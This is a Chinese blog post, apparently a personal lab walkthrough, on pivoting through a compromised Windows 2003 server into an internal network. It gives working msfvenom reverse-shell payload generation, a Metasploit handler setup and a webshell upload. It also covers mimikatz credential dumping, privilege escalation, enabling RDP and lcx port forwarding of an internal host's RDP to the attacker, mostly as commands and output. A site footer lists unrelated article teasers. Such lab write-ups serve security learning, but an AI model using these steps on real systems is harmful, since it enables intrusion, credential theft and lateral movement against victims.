内网端口转发与代理

思路:渗透的前提是双方能够建立通信。目前无法和win7建立通信,但是拿到了windows2003的权限,所以可以在Windows2003主机上面建立节点,作为跳板机去访问到内网。

目前状态:控制win2003(IP:192.168.1.200/10.1.3.128)
                  发现内网win7和win10
目的:通过控制的win2003  访问win7(IP:10.1.3.136如果是192.168.1.162也可以),
        win10无法远程连接??

攻击机:本地192.168.1.122
                VM kali:192.168.1.146(10.1.2.152)

MSF代理转发通信(正向连接)
1,利用MSF生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.146 lport=4444 -f exe >su.exe
结果:
    msf6 > msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.146 lport=4444 -f exe >su.exe
    [*] exec: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.146 lport=4444 -f exe >su.exe


2,msf进入监听模式
输入命令设置本地监听,具体命令如下:
启动msf:
        msfconsole
选择工具:
        use exploit/multi/handler
设置攻击语句:
        set payload windows/meterpreter/reverse_tcp
设置监听IP(注意IP地址是本地kali机器的IP地址):
        set lhost 192.168.1.146
设置监听端口:
        set lport 4444
开始监听:
        exploit或者run


3,使用webshell将脚本上传都目标服务器(蚁剑为例)

        2003中,phpstudy的端口为90,

        外网访问 http://192.168.1.200:90/phpinfo.php(相对内网来说)

蚁剑配置IP:192.168.1.200:90/123.php,密码为123
    编码器:选择base64(两个),点击测试,提示测试成功

通过蚁剑上传su.exe,
通过蚁剑的控制台运行su.exe
C:\phpStudy\WWW> su.exe

msf上线
[*] Started reverse TCP handler on 192.168.1.146:4444
[*] Sending stage (175686 bytes) to 192.168.1.200
[*] Meterpreter session 1 opened (192.168.1.146:4444 -> 192.168.1.200:1082) at 2024-04-29 00:57:12 -0400

【win2003中的IIS还有一个内部访问网站,IP为2003的IP(10.1.3.128),端口84,本地可以访问http://10.1.3.128:84

这里有两个网站,IIS的04网站是内网访问,PHPStudy的网站是外网访问,

被一句话木马控制的是php网站,蚁剑上传的木马也是上传到PHP网站内,所以这里跟IIS的网站好像无关。。。】


5,信息收集
调用mimikatz模块:
load mimikatz
收集账号密码:
creds_all
查看当前目标机器IP地址:
ipconfig
需要提升为system权限:
getsystem

查询权限
getuid

6,使用转发工具进行lcx.exe端口转发

        通过蚁剑上传lcx.exe到win2003


7,开启3389远程桌面(其实2003不开启3389,win7开启,也能端口转发,但是怎么开启win7的远程桌面呢?)
run getgui -e

[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[-] The specified meterpreter session script could not be found: getgui

上面运行失败,这时可以运行
run post/windows/manage/enable_rdp
结果:成功
meterpreter > run post/windows/manage/enable_rdp

[*] Enabling Remote Desktop
[*]     RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]     The Terminal Services service is not set to auto, changing it to auto ...
[*]     Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20240429034339_default_192.168.1.200_host.windows.cle_651229.txt


目前状态:控制win2003(IP:192.168.1.200/10.1.3.128)
            发现内网win7和win10
目的,通过控制的win2003访问win7(IP:192.168.1.162),
win10无法远程连接??

攻击机:本地192.168.1.122
        VMkali:192.168.1.146(10.1.2.152)


8,MSF进入shell命令行,执行命令,将目标机器的3389端口转发到攻击机的IP地址和自定义端口上
shell(注意,这里一定要进入shell,否则命令无效)
        lcx.exe -slave 192.168.1.122(攻击机) 53 10.1.3.136(win7,内网其它机器) 3389
        lcx.exe -slave 192.168.1.122 53 10.1.3.136 3389
说明:2003的通过端口转发,把内网另外一台机器的3389端口转发给攻击机53

这样也是可以的,如果不是内网IP的话

9,本地攻击机执行命令实现端口二次转发(lcx工具的规定用法)
打开本机(不是kali,目前是x13)中的
E:\......\工具\工具\lcx
目录下的1.bat,执行以下命令 (这条命令最好比第8条先执行)(其实就是在lcx.exe位置打开cmd.exe)
lcx.exe -listen 53 1234

10,攻击机打开远程桌面连接,直接连接本机的1234端口

目前存在的问题:怎么获取win7的账号密码,怎么开启win7的3389

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/593913.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

基于JSP的人才公寓管理系统

目录 背景 技术简介 系统简介 界面预览 背景 随着互联网的广泛推广和应用,人才公寓管理系统在网络技术的推动下迅速进步。该系统的设计初衷是满足住户的实际需求,通过深入了解住户的期望,开发出高度定制化的人才公寓管理系统。利用互联网…

如何进行Go语言的性能测试和调优?

文章目录 开篇一、性能测试1. 使用标准库中的testing包2. 使用第三方工具 二、性能调优1. 优化算法和数据结构2. 减少不必要的内存分配和垃圾回收3. 并发和并行 结尾 开篇 Go语言以其出色的性能和简洁的语法受到了广大开发者的喜爱。然而,在实际开发中,…

39.乐理基础-拍号-认识音符

拍号是一个分数的形式,如下图篮色的圈圈里的东西,但它的实际意义和分数没什么关系,只是外观上是一个分数的形式 单独拿出拍号,如下图: 然后接下来只要搞懂什么是 Y分音符、一拍、小节就可以了。 音符: 控…

Java | Leetcode Java题解之第67题二进制求和

题目&#xff1a; 题解&#xff1a; class Solution {public String addBinary(String a, String b) {StringBuffer ans new StringBuffer();int n Math.max(a.length(), b.length()), carry 0;for (int i 0; i < n; i) {carry i < a.length() ? (a.charAt(a.leng…

特征提取(Feature Extraction)常见统计特征笔记(三)

统计特征是描述数据集中值的一组量&#xff0c;通常用于了解数据的分布、集中趋势和变异程度。常见的统计特征包括均值、中位数、众数、标准差、方差等。下面会详细解释每个统计特征&#xff0c;并给出相应的Python代码。 1、均值&#xff08;Mean&#xff09;&#xff1a;所有…

分布式存储 Ceph 的演进经验

从 2004 年到今天&#xff0c;Ceph 的存储后端一直都在演变&#xff0c;从最开始基于 B 树的 EBOFS 演变到今天的 BlueStore&#xff0c;存储后端已经变得非常成熟&#xff0c;新的存储系统不仅能够提供良好的性能&#xff0c;还有着优异的兼容性。我们在这篇文章中将要简单介绍…

华为eNSP小型园区网络配置(上)

→跟着大佬学习的b站直通车← 目标1&#xff1a;dhcp分配ip地址 目标2&#xff1a;内网用户访问www.yzy.com sw1 # vlan batch 10 # interface Ethernet0/0/1port link-type accessport default vlan 10 # interface Ethernet0/0/2port link-type trunkport trunk allow-pass…

【Linux】网络连接配置——nmcli工具配置连接增删改查实例

nmcli工具配置连接增删改查实例 &#xff08;一&#xff09;网络连接配置基本项目1.网络接口配置2.主机名配置3.DNS服务器配置 &#xff08;二&#xff09;网络连接配置文件&#xff08;三&#xff09;网络配置方法&#xff08;四&#xff09;nmcli工具配置连接管理1.增2.查3.改…

prometheus+grafana的安装与部署及优点

一、Prometheus 的优点 1、非常少的外部依赖&#xff0c;安装使用超简单&#xff1b; 2、已经有非常多的系统集成 例如&#xff1a;docker HAProxy Nginx JMX等等&#xff1b; 3、服务自动化发现&#xff1b; 4、直接集成到代码&#xff1b; 5、设计思想是按照分布式、微服…

GPT-3

论文&#xff1a;Language Models are Few-Shot Learners&#xff08;巨无霸OpenAI GPT3 2020&#xff09; 摘要 最近的工作表明&#xff0c;通过对大量文本进行预训练&#xff0c;然后对特定任务进行微调&#xff0c;在许多NLP任务和基准方面取得了实质性进展。虽然这种方法…

stm32单片机开发二、定时器-内部时钟中断和外部时钟中断、编码器

定时器本质就是一个计数器 案例&#xff1a;定时器定时中断 内部时钟中断 Timer_Init(); //定时中断初始化 /*** 函 数&#xff1a;定时中断初始化* 参 数&#xff1a;无* 返 回 值&#xff1a;无*/ void Timer_Init(void) {/*开启时钟*/RCC_APB1PeriphClockCmd(RCC…

【AI】指定python3.10安装Jupyter Lab

家里电脑 13900K, bash 不识别pythoncmd可以,但是cmd似乎默认是python2.7这个是webrtc构建需要的.python3 则可以识别到但是版本是python3.12*多个版本如何通过制定的python3.10 的pip来安装软件,例如Jupyter Lab安装3.10 C:\Users\zhangbin\AppData\Roaming\Microsoft\Windo…

网络安全之从原理看懂XSS

01、XSS的原理和分类 跨站脚本攻击XSS(Cross Site Scripting)&#xff0c;为了不和层叠样式表(Cascading Style Sheets&#xff0c;CSS)的缩写混淆 故将跨站脚本攻击缩写为XSS&#xff0c;恶意攻击者往Web页面里插入恶意Script代码&#xff0c;当用户浏览该页面时&#xff0c…

【附poc】新中新中小学智慧校园信息管理系统存在SQL注入漏洞

新中新中小学智慧校园信息管理系统介绍&#xff1a;新中新利用云服务技术同时借鉴互联网模式&#xff0c;围绕基础教育信息化、智慧化建设&#xff0c;把线下业务和线上业务结合&#xff0c;为教育主管部门、校园管理者、教师、学生以及家长提供具有教务管理功能的平台化、移动…

基于TL431基准电压源的可调恒压恒流源的Multisim电路仿真设计

1、线性电源的工作原理 在我们日常应用里&#xff0c;直流电是从市电或电网中的交流电获取的。例如15V直流电压源、24V直流电压源等等。交流电变为直流电的过程大概分为一下几步&#xff1a; 首先&#xff0c;交流电通过变压器降低其电压幅值。接着&#xff0c;经过整流电路进…

八、Linux进程检测与控制

章节目标 了解进程和程序的关系了解进程的特点能够使用top动态查看进程信息能够使用ps静态查看进程信息能够使用kill命令给进程发送信号能够调整进程的优先级&#xff08;扩展&#xff09; 引言 在运维的日常工作中&#xff0c;监视系统的运行状况是每天例行的工作&#xff…

Spring IoCDI (1)

目录 一、IoC & DI入门 1、Spring是什么 &#xff08;1&#xff09;什么是容器&#xff1f; &#xff08;2&#xff09;什么是IoC&#xff1f; 二、IoC介绍 1、传统程序开发 2、解决方案 3、IoC程序开发 4、IoC优势 三、DI介绍 通过前面的学习&#xff0c;我们知…

分布式与一致性协议之ZAB协议(二)

ZAB协议 ZAB协议是如何实现操作地顺序性的&#xff1f; 如果用一句话解释ZAB协议到底是什么&#xff0c;我觉得它是能保证操作顺序性的、基于主备模式的原子广播协议。 接下来&#xff0c;还是以指令X、Y为例具体演示一下&#xff0c;帮助你更好地理解为什么ZAB协议能实现操作…

力扣每日一题113:路径总和||

题目 中等 给你二叉树的根节点 root 和一个整数目标和 targetSum &#xff0c;找出所有 从根节点到叶子节点 路径总和等于给定目标和的路径。 叶子节点 是指没有子节点的节点。 示例 1&#xff1a; 输入&#xff1a;root [5,4,8,11,null,13,4,7,2,null,null,5,1], targetSu…

【R语言数据分析】函数

目录 自定义函数 apply函数 分类汇总函数aggregate 自定义函数 R语言中的自定义函数更像是在自定义一种运算规则。 自定义函数的语法是 函数名 函数体 } 比如 表示定义了一个名为BMI_function的函数&#xff0c;这个函数代表了一种运算规则&#xff0c;就是把传入的x和…